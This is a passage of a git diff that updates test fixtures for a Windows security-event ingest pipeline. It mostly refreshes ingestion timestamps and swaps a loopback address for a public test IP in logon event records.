"DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:43.117413100Z", + "ingested": "2021-12-09T13:49:29.273298400Z", "code": "4770", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json index e6144295776..01fdc4730b2 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json @@ -73,7 +73,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:43.258335800Z", + "ingested": "2021-12-09T13:49:29.523881300Z", "code": "4771", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json index c0e78f9f60b..c792754bfde 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json @@ -59,7 +59,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:43.398664300Z", + "ingested": "2021-12-09T13:49:29.762661300Z", "code": "4776", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json index 7fd5b55b679..2902fa99439 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json @@ -66,7 +66,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:43.530747Z", + "ingested": "2021-12-09T13:49:29.967352100Z", "code": "4778", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json index 25d761201a5..7017706a35b 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json @@ -66,7 +66,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:43.660341700Z", + "ingested": "2021-12-09T13:49:30.189615100Z", "code": "4779", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json index 1dae9ccfc3f..fcb53a5535a 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json @@ -177,7 +177,7 @@ "TargetDomainName": "VAGRANT-2012-R2", "LogonType": "2", "AuthenticationPackageName": "Negotiate", - "IpAddress": "127.0.0.1", + "IpAddress": "89.160.20.156", "IpPort": "0", "SubjectLogonId": "0x3e7", "TargetLogonId": "0x1008e", @@ -622,7 +622,7 @@ "AuthenticationPackageName": "NTLM", "TargetUserSid": "S-1-5-21-3541430928-2051711210-1391384369-1001", "LogonProcessName": "NtLmSsp ", - "WorkstationName": "127.0.0.1", + "WorkstationName": "89.160.20.156", "ProcessName": "-", "LogonType": "3", "TransmittedServices": "-", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json index b417070594d..67bd3fc0fc3 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json @@ -79,7 +79,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793881800Z", + "ingested": "2021-12-09T13:49:30.420386900Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -177,7 +177,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793893400Z", + "ingested": "2021-12-09T13:49:30.420391200Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -261,7 +261,7 @@ }, "source": { "port": 0, - "ip": "127.0.0.1", + "ip": "89.160.20.156", "domain": "VAGRANT-2012-R2" }, "@timestamp": "2019-03-29T21:10:40.380Z", @@ -274,14 +274,14 @@ "VAGRANT-2012-R2$" ], "ip": [ - "127.0.0.1" + "89.160.20.156" ] }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793901500Z", + "ingested": "2021-12-09T13:49:30.420397800Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -379,7 +379,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793909300Z", + "ingested": "2021-12-09T13:49:30.420402600Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -476,7 +476,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793917100Z", + "ingested": "2021-12-09T13:49:30.420406900Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -573,7 +573,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793921300Z", + "ingested": "2021-12-09T13:49:30.420412Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -670,7 +670,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793928800Z", + "ingested": "2021-12-09T13:49:30.420418Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -767,7 +767,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793934300Z", + "ingested": "2021-12-09T13:49:30.420423200Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -852,7 +852,7 @@ } }, "source": { - "domain": "127.0.0.1" + "domain": "89.160.20.156" }, "@timestamp": "2019-03-29T21:13:17.302Z", "ecs": { @@ -867,7 +867,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793940400Z", + "ingested": "2021-12-09T13:49:30.420427200Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -965,7 +965,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793949300Z", + "ingested": "2021-12-09T13:49:30.420431900Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1069,7 +1069,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793956Z", + "ingested": "2021-12-09T13:49:30.420436200Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1167,7 +1167,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793962600Z", + "ingested": "2021-12-09T13:49:30.420441700Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1265,7 +1265,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.793967800Z", + "ingested": "2021-12-09T13:49:30.420446300Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1363,7 +1363,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.794002200Z", + "ingested": "2021-12-09T13:49:30.420450800Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1461,7 +1461,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.794023Z", + "ingested": "2021-12-09T13:49:30.420454400Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1559,7 +1559,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.794028Z", + "ingested": "2021-12-09T13:49:30.420459800Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1657,7 +1657,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.794035300Z", + "ingested": "2021-12-09T13:49:30.420465300Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1764,7 +1764,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:22:43.794039900Z", + "ingested": "2021-12-09T13:49:30.420469500Z", "code": "4625", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json index 9cb6b1e6558..822e84517ed 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:46.770962900Z", + "ingested": "2021-12-09T13:49:35.154219200Z", "code": "4722", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -144,7 +144,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:46.770972100Z", + "ingested": "2021-12-09T13:49:35.154227600Z", "code": "4722", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json index 58c4d4dc03a..7e108203131 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:47.047175900Z", + "ingested": "2021-12-09T13:49:35.537944700Z", "code": "4723", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -144,7 +144,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:47.047193200Z", + "ingested": "2021-12-09T13:49:35.537953700Z", "code": "4723", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json index f2ae4a0af07..942bd24df8b 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:47.311426300Z", + "ingested": "2021-12-09T13:49:35.985269800Z", "code": "4724", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -144,7 +144,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:47.311438100Z", + "ingested": "2021-12-09T13:49:35.985278Z", "code": "4724", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json index 7f70f72469b..2e4881719b2 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:47.610952900Z", + "ingested": "2021-12-09T13:49:36.413361600Z", "code": "4725", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -144,7 +144,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:47.610968200Z", + "ingested": "2021-12-09T13:49:36.413370100Z", "code": "4725", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json index 7d4f6275fc1..be08e2e8a84 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:47.917265300Z", + "ingested": "2021-12-09T13:49:36.838300Z", "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -146,7 +146,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:47.917272800Z", + "ingested": "2021-12-09T13:49:36.838309800Z", "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json index c4d6035b082..cdc51d42674 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:48.193779Z", + "ingested": "2021-12-09T13:49:37.304052Z", "code": "4727", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json index 6587fc4cd5a..60d2c7f6d1b 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:48.343331400Z", + "ingested": "2021-12-09T13:49:37.546890900Z", "code": "4728", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json index ee7ad81b7d2..ec94b2603cb 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:48.497223Z", + "ingested": "2021-12-09T13:49:37.850981400Z", "code": "4729", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json index ef2313ae419..1ae7b06e189 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json @@ -61,7 +61,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:48.663842200Z", + "ingested": "2021-12-09T13:49:38.159840600Z", "code": "4730", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json index 14460343e9f..c1ccdff1d35 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:48.801831400Z", + "ingested": "2021-12-09T13:49:38.413708300Z", "code": "4731", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json index 952e4e6f9e0..5557cd7ceea 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:48.956312700Z", + "ingested": "2021-12-09T13:49:38.657225700Z", "code": "4732", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json index d493ff52571..a8df2107b98 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:49.117726500Z", + "ingested": "2021-12-09T13:49:38.961223300Z", "code": "4733", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json index 98eb2d7ec7c..11fc4c38c09 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json @@ -61,7 +61,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:49.284818500Z", + "ingested": "2021-12-09T13:49:39.271630500Z", "code": "4734", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json index 4dc5565dd02..a746ab6c0b4 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:49.425635700Z", + "ingested": "2021-12-09T13:49:39.528673800Z", "code": "4735", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json index bf22704b42b..c9323846631 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:49.563295200Z", + "ingested": "2021-12-09T13:49:39.770336100Z", "code": "4737", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json index 917b30240fb..fd844d3adee 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json @@ -88,7 +88,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:49.714606400Z", + "ingested": "2021-12-09T13:49:40.027237800Z", "code": "4738", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json index 96f7811a28f..d8ef5861ef4 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:49.923875300Z", + "ingested": "2021-12-09T13:49:40.323281100Z", "code": "4740", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json index 56672b83791..b06b22e2730 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:50.068119900Z", + "ingested": "2021-12-09T13:49:40.567987900Z", "code": "4754", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json index dbf34c4d7ad..2d88445d368 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:50.213326800Z", + "ingested": "2021-12-09T13:49:40.817070400Z", "code": "4755", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json index 4beccbcd2ed..640103b5409 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:50.360935Z", + "ingested": "2021-12-09T13:49:41.069731Z", "code": "4756", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json index ca2a49daf00..656d9ca9871 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:50.518610900Z", + "ingested": "2021-12-09T13:49:41.372534300Z", "code": "4757", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json index 8fe35481546..df35aa344d8 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json @@ -61,7 +61,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:50.667565900Z", + "ingested": "2021-12-09T13:49:41.673374400Z", "code": "4758", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json index e6cd34447df..0fda5525911 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:50.809818300Z", + "ingested": "2021-12-09T13:49:41.921403400Z", "code": "4764", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json index 167346cc8a7..d85f32ed13b 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:50.950740300Z", + "ingested": "2021-12-09T13:49:42.169954Z", "code": "4767", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json index c2a9cb5757a..fd1af6c3fee 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:51.084922400Z", + "ingested": "2021-12-09T13:49:42.400276500Z", "code": "4781", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -150,7 +150,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:51.084933Z", + "ingested": "2021-12-09T13:49:42.400285800Z", "code": "4781", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json index 36c72262e25..b99ada28223 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json @@ -64,7 +64,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-06-14T13:22:51.354317300Z", + "ingested": "2021-12-09T13:49:42.839726300Z", "code": "4798", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json 